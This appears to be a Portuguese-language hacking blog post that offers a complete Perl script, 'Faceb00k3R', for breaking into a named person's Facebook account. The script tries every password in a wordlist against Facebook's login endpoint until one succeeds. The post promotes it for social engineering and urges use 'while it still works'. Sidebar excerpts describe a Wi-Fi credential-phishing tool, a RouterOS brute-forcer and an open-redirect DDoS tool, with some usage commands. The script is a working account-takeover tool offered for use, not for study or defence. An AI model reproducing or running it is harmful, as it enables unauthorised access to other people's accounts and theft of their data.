Pular para o conteúdo principal

Faceb00k3R tool , e melhor em perl

Corra enquanto ainda funciona


segue versão com user agente em pt-br para melhor engenharia social

github http://goo.gl/8cv6Lp

 #!/usr/bin/perl  
 #  
 use strict;  
 use Net::SSLeay::Handle;  
 if(!defined($ARGV[0] && $ARGV[1])) {  
 system('clear');  
 print "                Version 2.32 \n";  
 print "\033[1;32md88888b .d8b.  .o88b. d88888b d8888b. .d88b. db  dD d88888b d8888b. \n";  
 print "88'   d8' `8b d8P Y8 88'   88 `8D .8P Y8. 88 ,8P' 88'   88 `8D \n";  
 print "88ooo  88ooo88 8P   88ooooo 88oooY' 88  88 88,8P  88ooooo 88oobY' \n";  
 print "88~~~  88~~~88 8b   88~~~~~ 88~~~b. 88  88 88`8b  88~~~~~ 88`8b  \n";  
 print "88   88  88 Y8b d8 88.   88  8D `8b d8' 88 `88. 88.   88 `88. \n";  
 print "YP   YP  YP `Y88P' Y88888P Y8888P' `Y88P' YP  YD Y88888P 88  YD \n";  
 print "\033[1;31m     ======================================================\n";  
 print "\033[1;37m        Usage: perl $0 Email wordlist.txt\n\n\n\n\n\n\n\n\n";  
 print "\033[1;31m     ======================================================\n";  
 print "\n";  
 print "\n";  
 print "\n";  
 print "\n";  
 print "\n";  
 print "\n";  
 exit; }  
 my $user = $ARGV[0];  
 my $wordlist = $ARGV[1];  
 open (LIST, $wordlist) || die "\n[-] Can't find/open $wordlist\n";  
 print "                Version 2.32 \n";  
 print "\033[1;32md88888b .d8b.  .o88b. d88888b d8888b. .d88b. db  dD d88888b d8888b. \n";  
 print "88'   d8' `8b d8P Y8 88'   88 `8D .8P Y8. 88 ,8P' 88'   88 `8D \n";  
 print "88ooo  88ooo88 8P   88ooooo 88oooY' 88  88 88,8P  88ooooo 88oobY' \n";  
 print "88~~~  88~~~88 8b   88~~~~~ 88~~~b. 88  88 88`8b  88~~~~~ 88`8b  \n";  
 print "88   88  88 Y8b d8 88.   88  8D `8b d8' 88 `88. 88.   88 `88. \n";  
 print "YP   YP  YP `Y88P' Y88888P Y8888P' `Y88P' YP  YD Y88888P 88  YD \n";  
 print "\033[1;31m     ======================================================\n";  
 print "\033[1;31m              VISIT US ON FACEBOOK:         \n";  
 print "\033[1;31m         https://www.facebook.com/BackTrack.Fan.Page/   \n";  
 print "\033[1;33m              Made by [[Cyb3rw0rM]]         \n";  
 print "\033[1;31m     ========================================================\n";  
 print "\033[1;39m\n [+] Cracking Started on: $user ...\n\n";  
 print "=======================================\n";  
 while (my $password = <LIST>) {  
 chomp ($password);  
 $password =~ s/([^^A-Za-z0-9\-_.!~*'()])/ sprintf "%%%0x", ord $1 /eg;  
 my $a = "POST /login.php HTTP/1.1";  
 my $b = "Host: www.facebook.com";  
 my $c = "Connection: close";  
 my $e = "Cache-Control: max-age=0";  
 my $f = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";  
 my $g = "Origin: https://www.facebook.com";  
 my $h = "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31";  
 my $i = "Content-Type: application/x-www-form-urlencoded";  
 my $j = "Accept-Encoding: gzip,deflate,sdch";  
 my $k = "Accept-Language: en-US,en;q=0.8";  
 my $l = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3";  
 my $cookie = "cookie: datr=80ZzUfKqDOjwL8pauwqMjHTa";  
 my $post = "lsd=AVpD2t1f&display=&enable_profile_selector=&legacy_return=1&next=&profile_selector_ids=&trynum=1&timezone=300&lgnrnd=031110_Euoh&lgnjs=1366193470&email=$user&pass=$password&default_persistent=0&login=Log+In";  
 my $cl = length($post);  
 my $d = "Content-Length: $cl";  
 my ($host, $port) = ("www.facebook.com", 443);  
 tie(*SSL, "Net::SSLeay::Handle", $host, $port);  
 print SSL "$a\n";  
 print SSL "$b\n";  
 print SSL "$c\n";  
 print SSL "$d\n";  
 print SSL "$e\n";  
 print SSL "$f\n";  
 print SSL "$g\n";  
 print SSL "$h\n";  
 print SSL "$i\n";  
 print SSL "$j\n";  
 print SSL "$k\n";  
 print SSL "$l\n";  
 print SSL "$cookie\n\n";  
 print SSL "$post\n";  
 my $success;  
 while(my $result = <SSL>){  
 if($result =~ /Location(.*?)/){  
 $success = $1;  
 }  
 }  
 if (!defined $success)  
 {  
 print "\033[1;31m[-] $password -> Failed \n";  
 close SSL;  
 }  
 else  
 {  
 print "\033[1;32m\n########################################################\n";  
 print "[+] \033[1;32mPassword Cracked: $password\n";  
 print "\033[1;32m########################################################\n\n";  
 close SSL;  
 exit;  
 }  
 }  

Comentários

Postagens mais visitadas deste blog

WiFiPhisher - Ataques Automatizados de Phishing Contra Redes Wi-Fi

Um pesquisador de segurança grego, chamado George Chatzisofroniou, desenvolveu uma ferramenta de engenharia social WiFi que é projetado para roubar credenciais de usuários de redes Wi-Fi segura. A ferramenta, batizada WiFiPhisher, foi lançado no site do desenvolvimento de software GitHub no domingo e está disponível gratuitamente para os usuários.   "É um ataque de engenharia social que não usa força bruta, em contraste com outros métodos. É uma maneira fácil de obter senhas WPA", disse George Chatzisofroniou. No entanto, existem várias ferramentas de hacker disponíveis na Internet que pode cortar de uma rede Wi-Fi segura, mas esta ferramenta automatiza múltipla Wi-Fi técnicas que o tornam um pouco diferente dos outros hackers. Ferramenta WiFiPhisher usa ataque "gêmeo do mal " cenário. O mesmo que o gêmeo do mal, a ferramenta cria primeiro um ponto de acesso sem fio falso (AP) mascarar-se como o legítimo Wi-Fi AP. Em seguida, ele dirige uma negação de...

MKBRUTUS – Brute Force para MikroTik e dispositivos com RouterOS

O MKBRUTUS é uma ferramenta desenvolvida em Python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto. O MKBRUTUS é uma ferramenta desenvolvida em Python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto. Desenvolvedores: Ramiro Caire  | ramiro.caire@gmail.com | Twitter: @rcaire Federico Massa | fgmassa@vanguardsec.com | Twitter: @fgmassa Projeto:   github.com/mkbrutusproject/mkbrutus 01 Passo Verifique a versão atual do python em seguida realiza a instalação da versão 3 root@kali:~# python –version (Exibe a versão do Python) root@kali:~# apt-get install python3 (Realiza a instalação do Python 3) 02 Passo Execute o comando de verificação da versão do Python novamente e observe que a versão não mudou mas a instalação da ver...

UFONet Open Redirect DDoS Attack

UFONet – is a tool designed to launch DDoS attacks against a target, using ‘Open Redirect’ vectors on third party web applications, like botnet. See this links for more info: https://www.python.org/downloads/ http://pycurl.sourceforge.net/ Installing UFONet UFONet runs on many platforms. It requires Python (2.x.y) and the following library: - python-pycurl - Python bindings to libcurl On Debian-based systems (ex: Ubuntu), run: sudo apt-get install python-pycurl Source libs: Searching for ‘zombies’ UFONet will search on google results for possible ‘Open Redirect’ vulnerable sites. A common query string should be like this: ‘proxy.php?url=’ ‘check.cgi?url=’ ‘checklink?uri=’ ‘validator?uri=’ So for example, you can begin a search with: ./ufonet -s 'proxy.php?url=' At the end of the process, you will be asked if you want to check the list retrieved to see if the urls are vulnerable. Wanna check if they are valid zombies? (Y/n) Also, y...